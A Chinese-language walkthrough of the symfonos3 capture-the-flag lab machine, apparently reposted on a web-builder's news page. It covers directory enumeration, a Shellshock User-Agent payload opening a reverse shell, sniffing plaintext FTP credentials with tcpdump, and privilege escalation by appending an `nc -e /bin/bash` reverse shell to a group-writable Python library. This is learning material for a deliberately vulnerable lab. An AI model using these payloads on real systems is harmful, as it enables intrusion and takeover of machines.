恒美微站 Logo 恒美微站
  • 首页
  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心
  • 联系我们

从目录枚举到bash破壳漏洞、从流量抓包到组权限提权:靶机练习之symfonos3

  • 首页
  • 资讯中心
  • /
  • 从目录枚举到bash破壳漏洞、从流量抓包到组权限提权:靶机练习之symfonos3

相关资讯

Transformer位置编码原理与实战技巧 2026/8/2 18:51:55
C++一维数组核心原理与实战:从内存模型到算法实现 2026/8/2 18:51:55
AI如何通过NLP技术重塑学术论文写作全流程 2026/8/2 18:51:56

最新资讯

ACDSee9.0免注册中文版:轻量级本地图像管理方案
从LOL战绩查询到数据驱动:游戏数据分析与实战复盘指南
CAD DXF文件生成G代码全流程解析:从图纸到机床指令的完整指南
ASMR深度放松:零距离头皮按摩与耳部清洁的沉浸式体验指南
会编网络:告别凭感觉下判断,Python帮我养成了数据思维
YOLO笔识别实战:小目标检测的数据构建与模型优化

今日推荐

零基础装 OpenClaw 小龙虾 AI:Windows 一键部署教程与避坑要点
Hermes Agent 本地部署新方案:Windows 整合包减少依赖报错
实测 OpenClaw 一键包,5 分钟完成本地自动化环境搭建

本周热门

备战数据库管理工程师校招:索引、事务、备份恢复核心考点解析
数字电路时序基石:深入理解建立时间与保持时间
蓝桥杯国赛超声波测距机:从单片机原理到嵌入式系统实战

本月精选

自研推理加速器Redwood:两周内实现PyTorch模型高效部署的实战教程
V4L2摄像头采集实战:从camera_client.rar到出图全流程解析
从“谁发明了钢琴键”到知识问答智能体:RAG与记忆工程实践

从目录枚举到bash破壳漏洞、从流量抓包到组权限提权:靶机练习之symfonos3

发布时间:2026/9/3 0:18:33
从目录枚举到bash破壳漏洞、从流量抓包到组权限提权:靶机练习之symfonos3 信息搜集nmap -sT --min-rate 10000 192.168.8.8 -p-ftp/ssh/web80,经典 的三个端口nmap -sT -sC -sV -O 192.168.8.8 -p21,22,80 -o portsftp的这个版本似乎是有文件复制的漏洞web渗透gobuster扫描先扫了一波敏感文件只出了一个gate目录gobuster dir -u http://192.168.8.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,bak,php进一步目录扫描仍然只出了一个目录gobuster dir -u http://192.168.8.8/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,bak,phpdirsearch递归扫描因为目录一层一层的出来这边考虑尝试直接用递归扫描dirsearch -u http://192.168.8.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e txt,bak,php -r --deep-recursive结果一样仍然只有一个目录dirb扫描换个工具再试一下呢dirb http://192.168.8.8有不同的结果,扫出了cgi-bin,字典中其实都是包含的这是为什么呢┌───────────┬──────────────────────────┬─────────────────────────┐ │ 工具 │ 目录测试方式 │ 能发现 ScriptAlias 目录 │ ├───────────┼──────────────────────────┼─────────────────────────┤ │ dirb │ 自动补 / 测试 │ 能 │ ├───────────┼──────────────────────────┼─────────────────────────┤ │ gobuster │ 不补 /依赖服务端 301 │ 不能 │ ├───────────┼──────────────────────────┼─────────────────────────┤ │ dirsearch │ 不补 /默认依赖 301 │ 不能 │简单用curl测试一下。不带/就会404了确实是这个原因目前得到了一个403的目录dirb继续扫了一下发现没有结果这边转头就换了gobuster,因为它配置大字典扫的更快,gobuster dir -u http://192.168.8.8/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,bak,php果然有隐藏目录打开发现似乎是一个脚本执行了uptime的命令可以查看时间和服务器状态kali本机中也有相应的程序nikto扫描走到这一步仍然没有特别明晰的思路于是尝试让nikto做一个web扫描nikto -h http://192.168.8.8/cgi-bin/underworld爆了一个cve的漏洞是shellshockbash破壳漏洞() { :; }; echo; /usr/bin/idburp抓包发送payload成功命令执行反弹shellUser-Agent: () { :; }; echo; /bin/bash -c bash -i /dev/tcp/192.168.8.11/4444 01linpeas提权靶机敏感信息因为没有找到太多有用的信息这边先用linpeas提权一下关键信息发现靶机有抓包工具tcpdump流量包抓取分析因为ftp是明文传输而靶机上面正好也有tcpdump抓包的环境所以这边进行抓包分析对外的网卡是ens33tcpdump -i ens33 -w ftp.pcap -c 10000 #这边可以指定数据包数量防止需要中断抓包导致反弹shell断联ens33网卡数据包没有关于ftp的数据ftp可能是内部lo网卡通信tcp.port 21tcpdump -i lo -w ftp.pcap泄露了密码账号密码hades/PTpZTfU4vxgzvRBE成功登录hades 的ftp提权凭证复用这边直接尝试用刚才的凭证登录ssh,也是直接成功登录因为抓包的时候发现ftp一直在内部通信所以尝试先找一下这个程序运行的位置find / -name ftp* 2/dev/null找到这个ftp,应该是定期做服务的状态监测它导入了一个ftplib的组权限提权执行id命令的时候发现hades有gods的组权限查找有1002组权限的文件、文件夹find / -name ftp -group 1002 -type f 2/dev/nullfind / -group 1002 -type d 2/dev/null发现1002拥有整个python2.7库的组权限这时候再查找一下ftplib的权限ls -liah ftplib*确实是有gods的组权限那就简单了直接再fptlib.py尾部追加payloadimport os os.system(nc -e /bin/bash 192.168.8.11 4444)同步开启反弹shell接收等待片刻成功提权小结一下靶机的难度是中级到hard之间打下来感觉还是有难度的。从一开始的目录枚举就有很多坑要踩不同的目录扫描工具扫描策略其实是有侧重的dirb会对目录和文件双重扫描gobuster扫的更快等等然后就是nikto针对web指纹的扫描还是比较好用的也是识别到了bash破壳漏洞linpeas作为linux后渗透工具也是经常会用到这个算是常规思路tcpdump流量包抓取ftp流量也是要mark的因为ftp它是明文传输只要能抓包就能拿到账号密码最后的组权限提权也是一个非常经典的案例通过在组权限的python库文件注入payload拿到root

关于恒美微站

恒美微站专注于为个体商户、工作室提供极简自助建站服务,让每个人都能轻松拥有专业网站。

快速链接

  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心

服务项目

  • 可视化建站
  • 拖拽编辑
  • 主题定制
  • SEO 优化
  • 网站托管

联系方式

  • 📍 地址:北京市朝阳区建国路 88 号
  • 📞 电话:400-888-8888
  • ✉️ 邮箱:info@hmyw.cn
  • 🕐 时间:周一至周日 9:00-18:00

© 2024 恒美微站 hmyw.cn 版权所有 | 京 ICP 备 12345678 号